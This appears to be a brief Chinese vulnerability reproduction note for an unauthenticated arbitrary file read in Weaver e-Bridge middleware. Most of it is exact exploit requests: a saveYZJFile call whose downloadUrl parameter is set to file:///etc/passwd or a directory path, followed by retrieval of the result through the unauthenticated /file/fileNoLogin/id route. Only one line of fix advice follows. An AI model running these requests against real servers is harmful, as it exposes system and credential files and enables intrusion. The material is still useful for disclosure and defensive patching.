泛微OA雲橋未授權任意文件讀取
一、漏洞描述
泛微雲橋(e-Bridge)是上海泛微公司在”互聯網+”的背景下研發的一款用於橋接互聯網開放資源與企業信息化系統的系統集成中間件。泛微雲橋存在任意文件讀取漏洞,攻擊者成功利用該漏洞,可實現任意文件讀取,獲取敏感信息。
二、漏洞影響版本
2018-2019 多個版本。
三、漏洞復現
第一步:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt,在返回包有id字符串
第二步:通過id值獲取文件內容(/file/fileNoLogin/id)
1、使用/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt,發現返回提示不存在文件或目錄,通過linux對大小寫敏感,判斷目標使用了linux系統
2、使用/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt,發現返回包中帶有id
3、通過查看文件接口訪問 /file/fileNoLogin/id
4、downloadUrl參數填寫目錄的絕對路徑時,可以造成目錄遍歷
四、漏洞修復建議
關閉程序路由 /file/fileNoLogin